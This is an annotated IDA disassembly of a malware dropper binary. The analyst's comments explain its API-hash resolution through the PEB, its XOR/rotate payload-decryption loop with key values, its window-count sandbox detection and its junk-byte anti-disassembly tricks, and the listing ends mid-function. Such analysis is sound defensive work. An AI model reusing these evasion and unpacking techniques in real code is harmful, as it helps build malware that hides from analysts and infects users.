seg000:00000000                   ;
seg000:00000000                   ; +-------------------------------------------------------------------------+
seg000:00000000                   ; |   This file has been generated by The Interactive Disassembler (IDA)    |
seg000:00000000                   ; +-------------------------------------------------------------------------+
seg000:00000000                   ;
seg000:00000000                   ; Input MD5   : 3D8ED11008205483BE04C48261B69D31
seg000:00000000                   ; Input CRC32 : 70E63344
seg000:00000000                   ; File Name   : Driden_x86_dropper.bin
seg000:00000000                   ; Format      : Binary file
seg000:00000000                   ; Base Address: 0000h Range: 0000h - 0C91h Loaded length: 00000C91h
seg000:00000000
seg000:00000000                   ;**************************************************************************
seg000:00000000                   ;                     Entry Point
seg000:00000000                   ;
seg000:00000000                                   .686p
seg000:00000000                                   .mmx
seg000:00000000                                   .model flat
seg000:00000000                   ; ===========================================================================
seg000:00000000                   ; Segment type: Pure code
seg000:00000000                   seg000          segment byte public 'CODE' use32
seg000:00000000                                   assume cs:seg000
seg000:00000000                                   assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
seg000:00000000 29 C6                             sub     esi, eax
seg000:00000002 E9 8C 03 00 00                    jmp     start
seg000:00000007
seg000:00000007                   ; --------------------------------------------------------------------------
seg000:00000007                   ;                                 Unused datas
seg000:00000007 83 EB 65                          sub     ebx, 65h ; 'e'
seg000:0000000A F7 DB                             neg     ebx
seg000:0000000C 83 F6 66                          xor     esi, 66h
seg000:0000000F 81 D6 A8 00 00 00                 adc     esi, 0A8h ; '¿'
seg000:00000015 F7 DF                             neg     edi
seg000:00000017 F7 DA                             neg     edx
seg000:00000019                   ;----------------------------------------------------------------------------
seg000:00000019
seg000:00000019
seg000:00000019                   ; ***************************************************************************
seg000:00000019                   ; *                           getModuleHandle                               *
seg000:00000019                   ; ***************************************************************************
seg000:00000019                   ; * DESCRIPTION : This function looks for a module base address using a     *
seg000:00000019                   ; * hash of the module name.                                                *
seg000:00000019                   ; *                                                                         *
seg000:00000019                   ; * INPUT :                                                                 *
seg000:00000019                   ; *   arg_0 = hash of module name                                           *
seg000:00000019                   ; *                                                                         *
seg000:00000019                   ; * OUTPUT :                                                                *
seg000:00000019                   ; *   EAX = module base address                                             *
seg000:00000019                   ; ***************************************************************************
seg000:00000019
seg000:00000019                   ; =============== S U B R O U T I N E =======================================
seg000:00000019                   ; Attributes: bp-based frame
seg000:00000019                   getModuleHandle proc near               ; ...
seg000:00000019                   var_1C          = dword ptr -1Ch
seg000:00000019                   var_18          = dword ptr -18h
seg000:00000019                   var_14          = dword ptr -14h
seg000:00000019                   var_10          = dword ptr -10h
seg000:00000019                   var_C           = dword ptr -0Ch
seg000:00000019                   var_4           = dword ptr -4
seg000:00000019                   arg_0           = dword ptr  8
seg000:00000019 55                                push    ebp
seg000:0000001A 89 E5                             mov     ebp, esp
seg000:0000001C 83 EC 1C                          sub     esp, 1Ch
seg000:0000001F 53                                push    ebx
seg000:00000020 56                                push    esi
seg000:00000021 57                                push    edi
seg000:00000022 13 55 E4                          adc     edx, [ebp+var_1C]
seg000:00000025 6A 30                             push    30h ; '0'
seg000:00000027 96                                xchg    eax, esi
seg000:00000028 EB 03                             jmp     short loc_2D
seg000:0000002A EC 89                             dw 89ECh
seg000:0000002C 72                                db 72h
seg000:0000002D                   loc_2D:                                 ; ...
seg000:0000002D 58                                pop     eax             ; EAX=0x30
seg000:0000002E 89 F9                             mov     ecx, edi        ; ECX=0x152DC1
seg000:00000030 64 FF 30                          push    dword ptr fs:[eax]
seg000:00000033 F7 D6                             not     esi
seg000:00000035 5A                                pop     edx             ; EDX = FS:[30h]
seg000:00000036 83 C7 0F                          add     edi, 0Fh
seg000:00000039 8B 52 0C                          mov     edx, [edx+0Ch]  ; EDX refers PEB_LDR_DATA which contains informations about modules loaded in process
seg000:0000003C 4B                                dec     ebx
seg000:0000003D EB 03                             jmp     short loc_42
seg000:0000003F 22 63 D0                          and     ah, [ebx-30h]
seg000:00000042                   loc_42:                                 ; ...
seg000:00000042 8D 52 14                          lea     edx, [edx+14h]  ; mLIST InMemOrder;
seg000:00000045 81 D7 F0 00 00 00                 adc     edi, 0F0h ; '­'
seg000:0000004B EB 01                             jmp     short loc_4E
seg000:0000004D 6A                                db 6Ah
seg000:0000004E                   loc_4E:                                 ; ...
seg000:0000004E 89 D3                             mov     ebx, edx        ; Saving first module address to know when stop to parse linked list
seg000:00000050 2B 4D EC                          sub     ecx, [ebp+var_14]
seg000:00000053                   loc_53:                                 ; ...
seg000:00000053 21 75 FC                          and     [ebp+var_4], esi
seg000:00000056 8B 12                             mov     edx, [edx]      ; Next module please
seg000:00000058 49                                dec     ecx
seg000:00000059 31 FF                             xor     edi, edi
seg000:0000005B 05 BB 00 00 00                    add     eax, 0BBh ; '+'
seg000:00000060 39 DA                             cmp     edx, ebx        ; All list done ?
seg000:00000062 75 1D                             jnz     short loc_81
seg000:00000064 C7 45 F4 E6 00 00+                mov     [ebp+var_C], 0E6h ; 'µ'
seg000:0000006B EB 01                             jmp     short loc_6E
seg000:0000006D AB                                stosd
seg000:0000006E                   loc_6E:                                 ; ...
seg000:0000006E 31 C0                             xor     eax, eax        ; EAX=0
seg000:00000070 87 55 F0                          xchg    edx, [ebp+var_10]
seg000:00000073 5F                                pop     edi
seg000:00000074 5E                                pop     esi
seg000:00000075 5B                                pop     ebx
seg000:00000076 C9                                leave
seg000:00000077 C2 04 00                          retn    4               ; ==> Module not found !
seg000:0000007A 19 D3                             sbb     ebx, edx
seg000:0000007C                   loc_7C:
seg000:0000007C EB 03                             jmp     short loc_81
seg000:0000007E 4F                                db  4Fh ; O
seg000:0000007F 87                unk_7F          db  87h ; ç
seg000:00000080 9A                                db  9Ah ; Ü
seg000:00000081                   loc_81:                                 ; ...
seg000:00000081 F7 D0                             not     eax
seg000:00000083 53                                push    ebx
seg000:00000084 F7 D0                             not     eax
seg000:00000086 EB 01                             jmp     short loc_89
seg000:00000088 9B                                wait
seg000:00000089                   loc_89:                                 ; ...
seg000:00000089 8D 72 24                          lea     esi, [edx+24h]  ; ESI -> LDR_MODULE.FullDllName
seg000:00000089                                                           ; 2 bytes length
seg000:00000089                                                           ; 2 bytes maxLength
seg000:00000089                                                           ; 4 bytes pointer to Unicode String
seg000:0000008C 0D EA 00 00 00                    or      eax, 0EAh
seg000:00000091 52                                push    edx
seg000:00000092 F7 D1                             not     ecx
seg000:00000094 0F B7 0E                          movzx   ecx, word ptr [esi] ; ECX = size of complete module name
seg000:00000097 15 F1 00 00 00                    adc     eax, 0F1h ; '±'
seg000:0000009C EB 02                             jmp     short loc_A0
seg000:0000009E 1A C0                             sbb     al, al
seg000:000000A0                   loc_A0:                                 ; ...
seg000:000000A0 8B 76 04                          mov     esi, [esi+4]    ; ESI refers module name
seg000:000000A3 89 D3                             mov     ebx, edx
seg000:000000A5 D1 E9                             shr     ecx, 1          ; length unicode->ascii
seg000:000000A7 F7 D8                             neg     eax
seg000:000000A9 83 F9 00                          cmp     ecx, 0          ; Name empty ?
seg000:000000AC 74 33                             jz      short loc_E1
seg000:000000AE 42                                inc     edx
seg000:000000AF                   EDI vaut 0 au début
seg000:000000AF                   nextChar:                               ; ...
seg000:000000AF 11 F2                             adc     edx, esi
seg000:000000B1 C1 C7 05                          rol     edi, 5
seg000:000000B4 90                                nop
seg000:000000B5 EB 03                             jmp     short loc_BA
seg000:000000B7 F9                                db 0F9h ; ¨
seg000:000000B8 91 7E                             db 91h, 7Eh
seg000:000000BA                   loc_BA:                                 ; ...
seg000:000000BA 66 AD                             lodsw                   ; AX = an unicode char of the name
seg000:000000BC 43                                inc     ebx
seg000:000000BD 25 FF FF 00 00                    and     eax, 0FFFFh     ; EAX = caractère unicode
seg000:000000C2 43                                inc     ebx
seg000:000000C3 EB 02                             jmp     short loc_C7
seg000:000000C5 81 94                             db 81h, 94h
seg000:000000C7                   loc_C7:                                 ; ...
seg000:000000C7 83 C8 20                          or      eax, 20h        ; Is it a space ?
seg000:000000CA 8B 55 E8                          mov     edx, [ebp+var_18]
seg000:000000CD 31 C7                             xor     edi, eax
seg000:000000CF 21 F0                             and     eax, esi        ; dumb
seg000:000000D1 EB 01                             jmp     short loc_D4
seg000:000000D3 0D                                db 0Dh
seg000:000000D4                   loc_D4:                                 ; ...
seg000:000000D4 81 F7 1F 6D 75 00                 xor     edi, 756D1Fh
seg000:000000DA 29 CB                             sub     ebx, ecx        ; dumb
seg000:000000DC 49                                dec     ecx
seg000:000000DD 75 D0                             jnz     short nextChar  ; Next char of the name please...
seg000:000000DF 87 D2                             xchg    edx, edx
seg000:000000E1                   loc_E1:                                 ; ...
seg000:000000E1 F7 D8                             neg     eax
seg000:000000E3 5A                                pop     edx
seg000:000000E4 87 C9                             xchg    ecx, ecx
seg000:000000E6 5B                                pop     ebx
seg000:000000E7 31 F6                             xor     esi, esi        ; ESI=0
seg000:000000E9 EB 01                             jmp     short loc_EC
seg000:000000EB 7D                                db 7Dh                  ; "}"
seg000:000000EC                   loc_EC:                                 ; ...
seg000:000000EC 3B 7D 08                          cmp     edi, [ebp+arg_0] ; Compare computed hash with the one looked for...
seg000:000000EF 75 10                             jnz     short loc_101
seg000:000000F1                   ; Ok, module found !!!
seg000:000000F1 87 F1                             xchg    esi, ecx
seg000:000000F3 8B 42 10                          mov     eax, [edx+10h]
seg000:000000F6 43                                inc     ebx
seg000:000000F7 5F                                pop     edi
seg000:000000F8 5E                                pop     esi
seg000:000000F9 5B                                pop     ebx
seg000:000000FA C9                                leave
seg000:000000FB C2 04 00                          retn    4
seg000:000000FE 2B 4D E8                          sub     ecx, [ebp+var_18]
seg000:00000101                   loc_101:                                ; ...
seg000:00000101 19 CE                             sbb     esi, ecx
seg000:00000103 E9 4B FF FF FF                    jmp     loc_53
seg000:00000103                   getModuleHandle endp
seg000:00000108
seg000:00000108
seg000:00000108                   ; ***************************************************************************
seg000:00000108                   ; *                           getAPIAddress                                 *
seg000:00000108                   ; ***************************************************************************
seg000:00000108                   ; * DESCRIPTION : This function is equivalent to GetProcAddress ().         *
seg000:00000108                   ; *                                                                         *
seg000:00000108                   ; * INPUT :                                                                 *
seg000:00000108                   ; *   arg_0 = module base address (or handle)                               *
seg000:00000108                   ; *   arg_4 = hash of function which entry point is looked for              *
seg000:00000108                   ; *                                                                         *
seg000:00000108                   ; * OUTPUT :                                                                *
seg000:00000108                   ; *   EAX = entry point of function                                         *
seg000:00000108                   ; ***************************************************************************
seg000:00000108
seg000:00000108                   ; =============== S U B R O U T I N E =======================================
seg000:00000108                   ; Attributes: bp-based frame
seg000:00000108                   getAPIAddress   proc near               ; ...
seg000:00000108                   var_58          = dword ptr -58h
seg000:00000108                   var_54          = dword ptr -54h
seg000:00000108                   var_3C          = dword ptr -3Ch
seg000:00000108                   var_34          = dword ptr -34h
seg000:00000108                   var_30          = dword ptr -30h
seg000:00000108                   var_2C          = dword ptr -2Ch
seg000:00000108                   var_28          = dword ptr -28h
seg000:00000108                   var_18          = dword ptr -18h
seg000:00000108                   var_10          = dword ptr -10h
seg000:00000108                   var_8           = dword ptr -8
seg000:00000108                   var_4           = dword ptr -4
seg000:00000108                   arg_0           = dword ptr  8
seg000:00000108                   arg_4           = dword ptr  0Ch
seg000:00000108 55                                push    ebp
seg000:00000109 89 E5                             mov     ebp, esp
seg000:0000010B 83 EC 58                          sub     esp, 58h
seg000:0000010E 53                                push    ebx
seg000:0000010F 56                                push    esi
seg000:00000110 57                                push    edi
seg000:00000111 43                                inc     ebx             ; EBX=1
seg000:00000112 EB 03                             jmp     short loc_117
seg000:00000114 3C 77                             cmp     al, 77h ; 'w'
seg000:00000116 48                                dec     eax
seg000:00000117                   loc_117:                                ; ...
seg000:00000117 8B 45 08                          mov     eax, [ebp+arg_0] ; Retrieve base address of module (ie handle)
seg000:0000011A 87 7D D4                          xchg    edi, [ebp+var_2C]
seg000:0000011D 89 C1                             mov     ecx, eax
seg000:0000011F 83 C1 3C                          add     ecx, 3Ch ; '<'
seg000:00000122 03 01                             add     eax, [ecx]      ; EAX=PE Header
seg000:00000124 11 CE                             adc     esi, ecx
seg000:00000126 83 C0 78                          add     eax, 78h ; 'x'  ; EAX -> module IMAGE_DATA_DIRECTORY
seg000:00000129 83 E2 1D                          and     edx, 1Dh
seg000:0000012C EB 03                             jmp     short loc_131
seg000:0000012E C7 DA                             dw 0DAC7h
seg000:00000130 03                                db 3
seg000:00000131                   loc_131:                                ; ...
seg000:00000131 FF 30                             push    dword ptr [eax] ; Stacking Export Table address...
seg000:00000133 0F AF D7                          imul    edx, edi
seg000:00000136 EB 02                             jmp     short loc_13A
seg000:00000138 C3                                retn
seg000:00000139 B8                                db 0B8h
seg000:0000013A                   loc_13A:                                ; ...
seg000:0000013A 58                                pop     eax             ; ...and unstacking it
seg000:0000013B 43                                inc     ebx
seg000:0000013C 03 45 08                          add     eax, [ebp+arg_0]
seg000:0000013F 31 CE                             xor     esi, ecx
seg000:00000141 EB 03                             jmp     short loc_146
seg000:00000143 51                                push    ecx
seg000:00000144 B4 1D                             mov     ah, 1Dh
seg000:00000146                   loc_146:                                ; ...
seg000:00000146 89 45 E8                          mov     [ebp+var_18], eax
seg000:00000149 8B 55 CC                          mov     edx, [ebp+var_34]
seg000:0000014C 8B 48 20                          mov     ecx, [eax+20h]
seg000:0000014F 89 C3                             mov     ebx, eax
seg000:00000151 EB 02                             jmp     short loc_155
seg000:00000153 4D                                dec     ebp
seg000:00000154 1E                                push    ds
seg000:00000155                   loc_155:                                ; ...
seg000:00000155 03 4D 08                          add     ecx, [ebp+arg_0]
seg000:00000158 42                                inc     edx
seg000:00000159 89 4D F0                          mov     [ebp+var_10], ecx
seg000:0000015C F7 D1                             not     ecx
seg000:0000015E 8B 48 18                          mov     ecx, [eax+18h]
seg000:00000161 F7 D3                             not     ebx
seg000:00000163 EB 03                             jmp     short loc_168
seg000:00000165 EB 5E                             jmp     short loc_1C5
seg000:00000167 3F                                aas
seg000:00000168                   loc_168:                                ; ...
seg000:00000168 89 4D D0                          mov     [ebp+var_30], ecx
seg000:0000016B 89 DB                             mov     ebx, ebx
seg000:0000016D                   loc_16D:                                ; ...
seg000:0000016D 11 C7                             adc     edi, eax
seg000:0000016F EB 02                             jmp     short loc_173
seg000:00000171 FA                                cli
seg000:00000172 ED                                in      eax, dx
seg000:00000173                   loc_173:                                ; ...
seg000:00000173 FF 4D D0                          dec     [ebp+var_30]
seg000:00000176 19 C3                             sbb     ebx, eax
seg000:00000178 8B 4D D0                          mov     ecx, [ebp+var_30]
seg000:0000017B 31 C0                             xor     eax, eax
seg000:0000017D EB 02                             jmp     short loc_181
seg000:0000017F A4                                movsb
seg000:00000180 27                                daa
seg000:00000181                   loc_181:                                ; ...
seg000:00000181 C1 E1 02                          shl     ecx, 2
seg000:00000184 46                                inc     esi
seg000:00000185 03 4D F0                          add     ecx, [ebp+var_10]
seg000:00000188 BB AB 00 00 00                    mov     ebx, 0ABh ; '½'
seg000:0000018D EB 01                             jmp     short loc_190
seg000:0000018F 9A                                db 9Ah
seg000:00000190                   loc_190:                                ; ...
seg000:00000190 8B 09                             mov     ecx, [ecx]
seg000:00000192 43                                inc     ebx
seg000:00000193 03 4D 08                          add     ecx, [ebp+arg_0]
seg000:00000196 19 C6                             sbb     esi, eax
seg000:00000198 31 C0                             xor     eax, eax
seg000:0000019A F7 D6                             not     esi
seg000:0000019C                   loc_19C:                                ; ...
seg000:0000019C 19 CF                             sbb     edi, ecx
seg000:0000019E 0F B6 11                          movzx   edx, byte ptr [ecx]
seg000:000001A1 F7 DB                             neg     ebx
seg000:000001A3 83 CA 20                          or      edx, 20h
seg000:000001A6 83 F6 14                          xor     esi, 14h
seg000:000001A9 EB 02                             jmp     short loc_1AD
seg000:000001AB 51                                push    ecx
seg000:000001AC F5                                cmc
seg000:000001AD                   loc_1AD:                                ; ...
seg000:000001AD C1 C0 05                          rol     eax, 5
seg000:000001B0 81 45 F8 9D 00 00+                add     [ebp+var_8], 9Dh ; 'Ø'
seg000:000001B7 31 D0                             xor     eax, edx
seg000:000001B9 81 75 A8 DD 00 00+                xor     [ebp+var_58], 0DDh
seg000:000001C0 35 1F 6D 75 00                    xor     eax, 756D1Fh
seg000:000001C5                   loc_1C5:                                ; ...
seg000:000001C5 81 C6 AF 00 00 00                 add     esi, 0AFh ; '»'
seg000:000001CB EB 02                             jmp     short loc_1CF
seg000:000001CD 28 DB                             sub     bl, bl
seg000:000001CF                   loc_1CF:                                ; ...
seg000:000001CF 41                                inc     ecx
seg000:000001D0 87 FE                             xchg    edi, esi
seg000:000001D2 80 39 00                          cmp     byte ptr [ecx], 0
seg000:000001D5 75 C5                             jnz     short loc_19C   ; Next char please...
seg000:000001D7 4E                                dec     esi
seg000:000001D8 EB 03                             jmp     short loc_1DD
seg000:000001DA 13 15                             dw 1513h
seg000:000001DC DE                                db 0DEh
seg000:000001DD                   loc_1DD:                                ; ...
seg000:000001DD 3B 45 0C                          cmp     eax, [ebp+arg_4] ; On compare le hash reçu en paramètre avec EAX
seg000:000001E0 75 4E                             jnz     short loc_230
seg000:000001E2 0F AF FF                          imul    edi, edi
seg000:000001E5 EB 01                             jmp     short loc_1E8
seg000:000001E7 42                                inc     edx
seg000:000001E8                   loc_1E8:                                ; ...
seg000:000001E8 8B 45 E8                          mov     eax, [ebp+var_18]
seg000:000001EB 09 C6                             or      esi, eax
seg000:000001ED 83 C0 24                          add     eax, 24h ; '$'
seg000:000001F0 F7 DA                             neg     edx
seg000:000001F2 8B 00                             mov     eax, [eax]
seg000:000001F4 F7 DE                             neg     esi
seg000:000001F6 03 45 08                          add     eax, [ebp+arg_0]
seg000:000001F9 46                                inc     esi
seg000:000001FA 8B 4D D0                          mov     ecx, [ebp+var_30]
seg000:000001FD F7 DF                             neg     edi
seg000:000001FF 0F B7 0C 48                       movzx   ecx, word ptr [eax+ecx*2]
seg000:00000203 42                                inc     edx
seg000:00000204 EB 02                             jmp     short loc_208
seg000:00000206 AD                                db 0ADh ; ¡
seg000:00000207 9A                                db 9Ah
seg000:00000208                   loc_208:                                ; ...
seg000:00000208 8B 45 E8                          mov     eax, [ebp+var_18]
seg000:0000020B 01 FA                             add     edx, edi
seg000:0000020D 83 C0 1C                          add     eax, 1Ch
seg000:00000210 89 DF                             mov     edi, ebx
seg000:00000212 8B 00                             mov     eax, [eax]
seg000:00000214 46                                inc     esi
seg000:00000215 03 45 08                          add     eax, [ebp+arg_0]
seg000:00000218 33 75 FC                          xor     esi, [ebp+var_4]
seg000:0000021B 8B 04 88                          mov     eax, [eax+ecx*4]
seg000:0000021E F7 DE                             neg     esi
seg000:00000220 03 45 08                          add     eax, [ebp+arg_0]
seg000:00000223 11 75 AC                          adc     [ebp+var_54], esi
seg000:00000226 5F                                pop     edi
seg000:00000227 5E                                pop     esi
seg000:00000228 5B                                pop     ebx
seg000:00000229 C9                                leave
seg000:0000022A C2 08 00                          retn    8
seg000:0000022D 87 55 D8                          xchg    edx, [ebp+var_28]
seg000:00000230                   loc_230:                                ; ...
seg000:00000230 11 F9                             adc     ecx, edi
seg000:00000232 EB 01                             jmp     short loc_235
seg000:00000234 20                                db 20h
seg000:00000235                   loc_235:                                ; ...
seg000:00000235 83 7D D0 00                       cmp     [ebp+var_30], 0
seg000:00000239 0F 85 2E FF FF FF                 jnz     loc_16D
seg000:0000023F 11 75 A8                          adc     [ebp+var_58], esi
seg000:00000242 31 C0                             xor     eax, eax
seg000:00000244 1B 75 C4                          sbb     esi, [ebp+var_3C]
seg000:00000247 5F                                pop     edi
seg000:00000248 5E                                pop     esi
seg000:00000249 5B                                pop     ebx
seg000:0000024A C9                                leave
seg000:0000024B C2 08 00                          retn    8
seg000:0000024B                   getAPIAddress   endp
seg000:0000024E
seg000:0000024E
seg000:0000024E                   ; ***************************************************************************
seg000:0000024E                   ; *                           bufferDecipher                                *
seg000:0000024E                   ; ***************************************************************************
seg000:0000024E                   ; * DESCRIPTION : This function deciphers a buffer (will be called to       *
seg000:0000024E                   ; *               decipher payload before unzipping it).                    *
seg000:0000024E                   ; *                                                                         *
seg000:0000024E                   ; * INPUT :                                                                 *
seg000:0000024E                   ; *   arg_0 = lpBuffer = address of the buffer to decipher                  *
seg000:0000024E                   ; *   arg_4 = bufferSize = size of the buffer to decipher                   *
seg000:0000024E                   ; *   arg_8 = key = deciphering key                                         *
seg000:0000024E                   ; *                                                                         *
seg000:0000024E                   ; * OUTPUT :                                                                *
seg000:0000024E                   ; *   nothing                                                               *
seg000:0000024E                   ; ***************************************************************************
seg000:0000024E
seg000:0000024E                   ; =============== S U B R O U T I N E =======================================
seg000:0000024E                   ; Attributes: bp-based frame
seg000:0000024E                   bufferDecipher  proc near               ; ...
seg000:0000024E                   var_30          = dword ptr -30h
seg000:0000024E                   var_24          = dword ptr -24h
seg000:0000024E                   var_20          = dword ptr -20h
seg000:0000024E                   var_1C          = dword ptr -1Ch
seg000:0000024E                   var_10          = dword ptr -10h
seg000:0000024E                   var_8           = dword ptr -8
seg000:0000024E                   lpBuffer        = dword ptr  8
seg000:0000024E                   bufferSize      = byte ptr  0Ch
seg000:0000024E                   key             = dword ptr  10h
seg000:0000024E 55                                push    ebp             ; lgBuffer = 0xB070
seg000:0000024E                                                           ; key = 0xA0D3CD56
seg000:0000024F 89 E5                             mov     ebp, esp
seg000:00000251 83 EC 24                          sub     esp, 24h
seg000:00000254 53                                push    ebx
seg000:00000255 56                                push    esi
seg000:00000256 01 5D E0                          add     [ebp+var_20], ebx
seg000:00000259 8D 45 0C                          lea     eax, [ebp+bufferSize]
seg000:0000025C FF 30                             push    dword ptr [eax] ; Stacks buffer size...
seg000:0000025E 87 7D F0                          xchg    edi, [ebp+var_10]
seg000:00000261 5B                                pop     ebx             ; ...and unstacks into EBX !
seg000:00000262 09 CE                             or      esi, ecx
seg000:00000264 EB 02                             jmp     short loc_268
seg000:00000266 1F                                db  1Fh
seg000:00000267 A9                                db 0A9h
seg000:00000268                   loc_268:                                ; ...
seg000:00000268 83 EB 03                          sub     ebx, 3
seg000:0000026B 87 CA                             xchg    ecx, edx
seg000:0000026D EB 01                             jmp     short loc_270
seg000:0000026F 5F                                pop     edi
seg000:00000270                   loc_270:                                ; ...
seg000:00000270 8B 75 08                          mov     esi, [ebp+lpBuffer]
seg000:00000273 8B 7D E4                          mov     edi, [ebp+var_1C]
seg000:00000276                   ;
seg000:00000276                   ;-------------------------------------------------------------
seg000:00000276                   ; Début boucle de déchiffrement
seg000:00000276                   ;
seg000:00000276                   ; EBX sert de compteur
seg000:00000276                   ;-------------------------------------------------------------
seg000:00000276                   nextDword:                              ; ...
seg000:00000276 31 C1                             xor     ecx, eax
seg000:00000278 83 FB 00                          cmp     ebx, 0
seg000:0000027B 74 6A                             jz      short loc_2E7   ; ======> No more bytes to decipher...
seg000:0000027D 0F AF FF                          imul    edi, edi
seg000:00000280 8B 06                             mov     eax, [esi]      ; Taking 4 bytes from the source...
seg000:00000282 49                                dec     ecx
seg000:00000283 33 45 10                          xor     eax, [ebp+key]  ; ...deciphering them...
seg000:00000286 0F AF FE                          imul    edi, esi
seg000:00000289 89 06                             mov     [esi], eax      ; ...and putting them back in the buffer !
seg000:0000028B 09 4D DC                          or      [ebp+var_24], ecx
seg000:0000028E FF 75 10                          push    [ebp+key]       ; Pushs the key on the stack
seg000:00000291 89 F2                             mov     edx, esi
seg000:00000293 C1 04 24 04                       rol     [esp+30h+var_30], 4 ; Rolling the key 4 bits left
seg000:00000297 C7 45 E0 FD 00 00+                mov     [ebp+var_20], 0FDh ; '²'
seg000:0000029E C1 04 24 02                       rol     [esp+30h+var_30], 2 ; ...and 2 more bits...
seg000:000002A2 6B FF 0B                          imul    edi, 0Bh
seg000:000002A5 EB 01                             jmp     short loc_2A8
seg000:000002A7 2B                                db 2Bh
seg000:000002A8                   loc_2A8:                                ; ...
seg000:000002A8 D1 04 24                          rol     [esp+30h+var_30], 1 ; ...and one more bit !
seg000:000002AB F7 DF                             neg     edi
seg000:000002AD 8D 4D 0C                          lea     ecx, [ebp+bufferSize]
seg000:000002B0 8B 09                             mov     ecx, [ecx]      ; ECX = buffer size
seg000:000002B2 29 0C 24                          sub     [esp+30h+var_30], ecx ; Key = key-bufferSize
seg000:000002B5 83 DA 17                          sbb     edx, 17h
seg000:000002B8 81 2C 24 8A 3F 61+                sub     [esp+30h+var_30], 49613F8Ah ; Key = Key-0x49673F8A
seg000:000002BF 4A                                dec     edx
seg000:000002C0 EB 02                             jmp     short loc_2C4
seg000:000002C2 15                                db  15h
seg000:000002C3 CE                                db 0CEh ; +
seg000:000002C4                   loc_2C4:                                ; ...
seg000:000002C4 81 2C 24 48 C3 34+                sub     [esp+30h+var_30], 34C348h ; Key=Key-0x34C348
seg000:000002CB 1B 7D F8                          sbb     edi, [ebp+var_8]
seg000:000002CE EB 02                             jmp     short loc_2D2
seg000:000002D0 D3 AF                             db 0D3h, 0AFh
seg000:000002D2                   loc_2D2:                                ; ...
seg000:000002D2 8F 45 10                          pop     [ebp+key]       ; Pops the key modified directly on the stack
seg000:000002D5 29 D8                             sub     eax, ebx
seg000:000002D7 4B                                dec     ebx
seg000:000002D8 8B 45 DC                          mov     eax, [ebp+var_24]
seg000:000002DB EB 02                             jmp     short loc_2DF
seg000:000002DD 33 21                             xor     esp, [ecx]
seg000:000002DF                   loc_2DF:                                ; ...
seg000:000002DF 46                                inc     esi
seg000:000002E0 F7 DA                             neg     edx
seg000:000002E2 EB 01                             jmp     short loc_2E5
seg000:000002E4 09                                db 9
seg000:000002E5                   loc_2E5:                                ; ...
seg000:000002E5 EB 8F                             jmp     short nextDword
seg000:000002E7                   loc_2E7:                                ; ...
seg000:000002E7 89 75 F0                          mov     [ebp+var_10], esi
seg000:000002EA EB 03                             jmp     short loc_2EF
seg000:000002EC C8 29 5B                          db 0C8h, 29h, 5Bh
seg000:000002EF                   loc_2EF:                                ; ...
seg000:000002EF 5E                                pop     esi
seg000:000002F0 5B                                pop     ebx
seg000:000002F1 C9                                leave
seg000:000002F2 C2 0C 00                          retn    0Ch
seg000:000002F2                   bufferDecipher  endp
seg000:000002F5
seg000:000002F5
seg000:000002F5                   ; ***************************************************************************************
seg000:000002F5                   ; *                                   detectSandbox ?                                   *
seg000:000002F5                   ; ***************************************************************************************
seg000:000002F5                   ; * DESCRIPTION : this function counts the Windows in the system and returns 1 if the   *
seg000:000002F5                   ; *               number of windows is 15, 1C, 7 or 6, else it returns 0.               *
seg000:000002F5                   ; *                                                                                     *
seg000:000002F5                   ; ***************************************************************************************
seg000:000002F5
seg000:000002F5                   ; =============== S U B R O U T I N E =======================================
seg000:000002F5                   ; Attributes: bp-based frame
seg000:000002F5                   detectSandbox   proc near               ; ...
seg000:000002F5                   var_8           = dword ptr -8
seg000:000002F5                   var_4           = dword ptr -4
seg000:000002F5                   arg_0           = dword ptr  8
seg000:000002F5                   arg_4           = dword ptr  0Ch
seg000:000002F5 55                                push    ebp
seg000:000002F6 89 E5                             mov     ebp, esp
seg000:000002F8 83 EC 34                          sub     esp, 34h
seg000:000002FB 87 7D FC                          xchg    edi, [ebp+var_4] ; EDI=0xC91
seg000:000002FE C7 45 F8 00 00 00+                mov     [ebp+var_8], 0
seg000:00000305 46                                inc     esi
seg000:00000306 8D 45 F8                          lea     eax, [ebp+var_8] ; [ebp+var_8] is the counter of windows
seg000:00000309 11 DE                             adc     esi, ebx
seg000:0000030B EB 03                             jmp     short loc_310
seg000:0000030D BC                                db 0BCh ; +
seg000:0000030E EA                                db 0EAh ; Û
seg000:0000030F AB                                db 0ABh ; ½
seg000:00000310                   loc_310:                                ; ...
seg000:00000310 50                                push    eax             ; EAX refers [ebp+var_8] => lpParam for future call to EnumWindows();
seg000:00000311 47                                inc     edi
seg000:00000312 E8 1F 00 00 00                    call    sub_336
seg000:00000317                   ; We will never return here since we have stacked only one parameter and called a portion
seg000:00000317                   ; of code who will call EnumWindows(). The return address stacked by the call will be
seg000:00000317                   ; used as the EnumWindows callback function.
seg000:00000317                   ; =======================================================================================
seg000:00000317
seg000:00000317
seg000:00000317
seg000:00000317                   ; ---------------------------------------------------------------------------------------
seg000:00000317                   ; Entry point of the EnumWindows callback function called by sub_336
seg000:00000317                   ;
seg000:00000317                   ; BOOL CALLBACK EnumWindowsProc ( _In_ HWND hwnd, _In_ LPARAM lParam );
seg000:00000317                   ;
seg000:00000317                   ; This callback function is used to count the number of windows in the system.
seg000:00000317 19 CA                             sbb     edx, ecx
seg000:00000319 8B 44 24 08                       mov     eax, [esp+arg_0] ; EAX = lParam = pointer to windows counter
seg000:0000031D 83 F1 2D                          xor     ecx, 2Dh
seg000:00000320 EB 02                             jmp     short loc_324
seg000:00000322 12 97                             dw 9712h
seg000:00000324                   loc_324:                                ; ...
seg000:00000324 FF 00                             inc     dword ptr [eax] ; Increment windows counter
seg000:00000326 29 F2                             sub     edx, esi
seg000:00000328 EB 01                             jmp     short loc_32B
seg000:0000032A AD                                lodsd
seg000:0000032B                   loc_32B:                                ; ...
seg000:0000032B B8 01 00 00 00                    mov     eax, 1          ; Return 1 to continue enumeration
seg000:00000330 4A                                dec     edx
seg000:00000331 C2 08 00                          retn    8
seg000:00000331                   detectSandbox   endp ; sp-analysis failed
seg000:00000334 29 F7                             sub     edi, esi
seg000:00000336                   ; ---------------------------------------------------------------------------------------
seg000:00000336
seg000:00000336
seg000:00000336                   ; =======================================================================================
seg000:00000336                   ; This is not really a subroutine. IDA had been fooled by the EnumWindows
seg000:00000336                   ; callback function hidden into sub_2F5
seg000:00000336                   ; =============== S U B R O U T I N E =======================================
seg000:00000336                   sub_336         proc near               ; ...
seg000:00000336 68 21 5E 53 7C                    push    7C535E21h       ; 'User32.dll'
seg000:0000033B E8 D9 FC FF FF                    call    getModuleHandle
